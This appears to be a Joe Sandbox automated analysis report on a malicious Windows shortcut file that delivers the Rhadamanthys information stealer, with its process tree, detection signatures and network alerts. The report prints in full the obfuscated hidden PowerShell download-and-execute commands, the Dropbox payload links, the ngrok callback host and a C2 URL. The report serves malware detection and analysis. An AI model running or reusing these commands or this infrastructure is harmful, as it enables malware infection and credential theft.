Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xWpAZpLw47.lnk

Overview

General Information

Sample name:xWpAZpLw47.lnk
renamed because original name is a hash value
Original sample name:097c3f660c7d255147e359239dafdbd5f24f25a1a9450863160fc049256c1908.lnk
Analysis ID:1578254
MD5:ae5d25dd208b36de2cf9b267cd269d9f
SHA1:5be143764fb671c3818e178298269e79d204c2e2
SHA256:097c3f660c7d255147e359239dafdbd5f24f25a1a9450863160fc049256c1908
Tags:Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 1276 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1440 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 5012 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7336 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2036,i,15400410564020983151,12558910162901878571,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 8916 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\475161710.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9048 cmdline: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 6612 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\aff7310e-e430-4b16-86a8-ee19b2c5c7f2.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 7420 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1792,i,8736209801987075174,5153992898519663710,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe (PID: 1628 cmdline: "C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe" MD5: F7A506F00E525E6D23AEE43D34219625)
            • 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe (PID: 8992 cmdline: "C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe" MD5: F7A506F00E525E6D23AEE43D34219625)
              • fontdrvhost.exe (PID: 8596 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 8572 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 8760 cmdline: C:\Windows\system32\WerFault.exe -u -p 8572 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 8432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8992 -s 204 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 1560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7260 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7596 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8728 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6388 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8780 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6664 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7884 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3176 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8304 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4568 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6692 --field-trial-handle=2108,i,2589558739445175851,9119733376117647865,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000003.2666979983.0000000002990000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000001B.00000003.2675887330.0000000003540000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      0000001B.00000002.2790586953.00000000035E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        0000001A.00000002.2685573009.0000000002D00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000001B.00000003.2679900766.0000000005880000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            27.3.fontdrvhost.exe.5880000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              26.3.678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.4ee0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                27.3.fontdrvhost.exe.5660000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  26.3.678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.5100000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    26.3.678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.5100000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powerup Write Hijack DLL
                      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1440, TargetFilename: C:\Users\user\AppData\Local\Temp\475161710.bat
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, ProcessId: 1628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nuinsa
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1440, TargetFilename: C:\Users\user\AppData\Local\Temp\475161710.bat
                      Sigma detected: PowerShell Web Download
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }", CommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\475161710.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8916, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d'; }", ProcessId: 9048, Pro
                      Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1276, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), ProcessId: 1440, ProcessName: powershell.exe
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), ProcessId: 1276, ProcessName: cmd.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1276, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing), ProcessId: 1440, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1560, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-19T13:44:21.721163+010028032742Potentially Bad Traffic192.168.2.549715162.125.69.18443TCP
                      2024-12-19T13:44:36.444269+010028032742Potentially Bad Traffic192.168.2.549809162.125.69.18443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-19T13:45:08.034785+010028548021Domain Observed Used for C2 Detected104.161.43.182845192.168.2.549901TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 25.2.678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe.5e8a4a.2.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop"}
                      Multi AV Scanner detection for submitted file
                      Source: xWpAZpLw47.lnkVirustotal: Detection: 29%Perma Link
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for sample
                      Source: xWpAZpLw47.lnkJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 3.124.142.205:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49729 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.5:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.124.142.205:443 -> 192.168.2.5:49835 version: TLS 1.2
                      Source: Binary string: softy.pdb source: powershell.exe, 00000013.00000002.2595787903.0000020128EE8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\Jenkins\workspace\ccd-app\main\native\win32\build\msvs_win32_x86\Release\x86\sym\AdobeUpdateService\AdobeUpdateService\AdobeUpdateService.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000000.2494880507.000000000049E000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000000.2654743905.000000000049E000.00000002.00000001.01000000.0000000F.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000013.00000002.2598990333.000002092A3BF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000013.00000002.2592766687.0000020128E30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2589734635.0000020128C11000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673659739.0000000005000000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673539742.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679053609.0000000005660000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679182345.0000000005780000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2674173791.0000000005100000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673969723.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679900766.0000000005880000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2670468533.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2672010118.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2677991112.0000000005850000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2677714771.0000000005660000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000013.00000002.2592766687.0000020128E30000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2672985656.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673228387.0000000005080000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2678687711.0000000005800000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2678434932.0000000005660000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2670468533.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2672010118.00000000050D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2677991112.0000000005850000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2677714771.0000000005660000.00000004.00000001.00020000.00000000.sdmp
